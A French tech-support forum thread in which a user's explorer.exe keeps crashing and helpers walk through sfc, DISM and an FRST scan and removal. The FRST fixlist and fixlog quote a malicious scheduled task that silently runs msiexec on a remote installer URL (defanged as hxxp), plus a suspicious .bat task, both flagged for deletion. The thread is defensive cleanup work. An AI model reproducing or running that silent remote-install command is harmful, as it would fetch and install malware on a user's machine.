Explorer.exe s'ouvre et se referme...
Résolu
M3F0
Messages postés
5
Date d'inscription
Statut
Membre
Dernière intervention
-
M3F0 Messages postés 5 Date d'inscription Statut Membre Dernière intervention -
M3F0 Messages postés 5 Date d'inscription Statut Membre Dernière intervention -
Bonjour cela fait quelques mois que j'ai un problème avec mon explorer.exe:
Quand je démarre ma session il y a quelques fois un écran noir et pas d'explorer (pas de barre des tâches, ni bureau, rien). Parfois quand je le démarre il s'affiche, il plante et il se ferme et l'explorer ne marche plus... J'ai essayé toutes les solutions que des personnes proposé, en vain... J'ai utilisé pleins d'anti-malware, pour tout désinfectiner et je n'ai aucun résultat par la suite... Avez-vous d'autres solutions s'il vous plaît ? Merci beaucoup
Quand je démarre ma session il y a quelques fois un écran noir et pas d'explorer (pas de barre des tâches, ni bureau, rien). Parfois quand je le démarre il s'affiche, il plante et il se ferme et l'explorer ne marche plus... J'ai essayé toutes les solutions que des personnes proposé, en vain... J'ai utilisé pleins d'anti-malware, pour tout désinfectiner et je n'ai aucun résultat par la suite... Avez-vous d'autres solutions s'il vous plaît ? Merci beaucoup
A voir également:
- Explorer.exe s'ouvre et se referme...
- Explorer.exe - Télécharger - Divers Utilitaires
- Windows ne s'ouvre pas - Guide
- Mon clavier n'écrit plus et ouvre des fenetres ✓ - Forum Windows Vista
- Instagram ne s'ouvre plus - Forum Instagram
- Hp smart ne s'ouvre pas ✓ - Forum Imprimante
3 réponses
quentin2121
Messages postés
9077
Date d'inscription
Statut
Membre
Dernière intervention
Ambassadeur
1 254
sfc /scannow à taper en invite de commande pour réparer windows
M3F0
Messages postés
5
Date d'inscription
Statut
Membre
Dernière intervention
Merci de ta réponse, J'ai un message suite à cette commande: La protection des ressources Windows n'a pas réussi à démarrer le service de réparation. :/
Salut,
Commence par ceci :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Commence par ceci :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.
Trois rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Merci de ta réponse, alors le fichier FRST.txt: https://pjjoint.malekal.com/files.php?id=FRST_20170729_n11u7w12p10w14
Shortcut.txt: https://pjjoint.malekal.com/files.php?id=20170729_t9r13q812t6
Additionnal.txt: https://pjjoint.malekal.com/files.php?id=20170729_d12v12q75r10 :)
Shortcut.txt: https://pjjoint.malekal.com/files.php?id=20170729_t9r13q812t6
Additionnal.txt: https://pjjoint.malekal.com/files.php?id=20170729_d12v12q75r10 :)
SearchProtocolHost.exe fait que de planter...
Error: (07/29/2017 07:05:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante SearchProtocolHost.exe, version : 7.0.9600.18722, horodatage : 0x593156e3
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x0000000000000000
ID du processus défaillant : 0x10a4
Heure de début de l’application défaillante : 0x01d3089553b7e7e4
Chemin d’accès de l’application défaillante : C:\Windows\system32\SearchProtocolHost.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : 91687aa8-7488-11e7-8464-80a58947f4a4
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Ensuite tu télécharges un peu tout et n'importe quoi
à un moment tu as téléchargé un crack vérolé.
Désinstalle WildTangent Games, si tu ne t'en sers pas.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
~~
Commence par lancer une Réparation DISM
Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)" ou par une recherche Cortana :
https://www.malekal.com/wp-content/uploads/ouvrir-invite-commandes-administrateur-Windows10.gif
Saisir DISM /Online /Cleanup-image /Restorehealth dans la fenêtre.
(attention, il y a un espace devant chaque commande commençant par / /Online /Cleanup-image etc)
Redémarre.
Tu peux lancer une Réparation SFC
Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)",
Saisir sfc /scannow dans la fenêtre.
Ça doit te dire que la protection a détecté des éléments endommagés,
qu'il faut redémarrer pour pouvoir les corriger. A ce moment, redémarre.
~~
Si pas mieux :
- créé un nouvel utilisateur Windows, vois ce que cela donne dessus
- test en désinstallant Avast et Malwarebytes.
Veuillez appuyer sur une touche pour continuer la désinfection...
Error: (07/29/2017 07:05:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante SearchProtocolHost.exe, version : 7.0.9600.18722, horodatage : 0x593156e3
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x0000000000000000
ID du processus défaillant : 0x10a4
Heure de début de l’application défaillante : 0x01d3089553b7e7e4
Chemin d’accès de l’application défaillante : C:\Windows\system32\SearchProtocolHost.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : 91687aa8-7488-11e7-8464-80a58947f4a4
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Ensuite tu télécharges un peu tout et n'importe quoi
à un moment tu as téléchargé un crack vérolé.
Désinstalle WildTangent Games, si tu ne t'en sers pas.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
Task: {C6EE40A0-943F-43CB-AF2C-9291C8833E97} - System32\Tasks\Ezurgyua => C:\PROGRA~1\JUKMIS~1\Ogaocfu.bat <==== ATTENTION
Task: {AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXDT01ACA100_95J23XZNSXX95J23XZNSX&v=2017214 /q <==== ATTENTION
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-07-29 17:34 - 2017-07-29 17:34 - 00000000 ____D C:\Users\Monsieur\AppData\Local\Apps\2.0
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
~~
Commence par lancer une Réparation DISM
Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)" ou par une recherche Cortana :
https://www.malekal.com/wp-content/uploads/ouvrir-invite-commandes-administrateur-Windows10.gif
Saisir DISM /Online /Cleanup-image /Restorehealth dans la fenêtre.
(attention, il y a un espace devant chaque commande commençant par / /Online /Cleanup-image etc)
Redémarre.
Tu peux lancer une Réparation SFC
Clique-droit sur le menu "Démarrer" puis "Invites de commandes (admin)",
Saisir sfc /scannow dans la fenêtre.
Ça doit te dire que la protection a détecté des éléments endommagés,
qu'il faut redémarrer pour pouvoir les corriger. A ce moment, redémarre.
~~
Si pas mieux :
- créé un nouvel utilisateur Windows, vois ce que cela donne dessus
- test en désinstallant Avast et Malwarebytes.
Veuillez appuyer sur une touche pour continuer la désinfection...
Contenu du fichier fixlog.txt:
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 29-07-2017
Exécuté par Monsieur (29-07-2017 20:08:40) Run:1
Exécuté depuis C:\Users\Monsieur\Desktop\LEUCATE
Profils chargés: Monsieur (Profils disponibles: Monsieur & vays_000)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
Task: {C6EE40A0-943F-43CB-AF2C-9291C8833E97} - System32\Tasks\Ezurgyua => C:\PROGRA~1\JUKMIS~1\Ogaocfu.bat <==== ATTENTION
Task: {AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXDT01ACA100_95J23XZNSXX95J23XZNSX&v=2017214 /q <==== ATTENTION
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-07-29 17:34 - 2017-07-29 17:34 - 00000000 ____D C:\Users\Monsieur\AppData\Local\Apps\2.0
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ezurgyua => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ezurgyua => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Coecapyzirucult => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Coecapyzirucult => clé supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
C:\Users\Monsieur\AppData\Local\Apps\2.0 => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 139050237 B
Java, Flash, Steam htmlcache => 170225894 B
Windows/system/drivers => 754867 B
Edge => 0 B
Chrome => 237962748 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 248631 B
systemprofile32 => 0 B
LocalService => 13042 B
NetworkService => 128 B
Monsieur => 69176136 B
vays_000 => 0 B
vays_000.GAMERER => 179347896 B
RecycleBin => 777592 B
EmptyTemp: => 760.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 29-07-2017
Exécuté par Monsieur (29-07-2017 20:08:40) Run:1
Exécuté depuis C:\Users\Monsieur\Desktop\LEUCATE
Profils chargés: Monsieur (Profils disponibles: Monsieur & vays_000)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
Task: {C6EE40A0-943F-43CB-AF2C-9291C8833E97} - System32\Tasks\Ezurgyua => C:\PROGRA~1\JUKMIS~1\Ogaocfu.bat <==== ATTENTION
Task: {AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} - System32\Tasks\Coecapyzirucult => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=TOSHIBAXDT01ACA100_95J23XZNSXX95J23XZNSX&v=2017214 /q <==== ATTENTION
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-07-29 17:34 - 2017-07-29 17:34 - 00000000 ____D C:\Users\Monsieur\AppData\Local\Apps\2.0
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6EE40A0-943F-43CB-AF2C-9291C8833E97} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ezurgyua => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ezurgyua => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF4B2626-70A8-4EFB-ADD5-272C0F87CEDF} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Coecapyzirucult => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Coecapyzirucult => clé supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
C:\Users\Monsieur\AppData\Local\Apps\2.0 => déplacé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2720609676-640744055-1273418059-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 139050237 B
Java, Flash, Steam htmlcache => 170225894 B
Windows/system/drivers => 754867 B
Edge => 0 B
Chrome => 237962748 B
Firefox => 0 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 248631 B
systemprofile32 => 0 B
LocalService => 13042 B
NetworkService => 128 B
Monsieur => 69176136 B
vays_000 => 0 B
vays_000.GAMERER => 179347896 B
RecycleBin => 777592 B
EmptyTemp: => 760.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.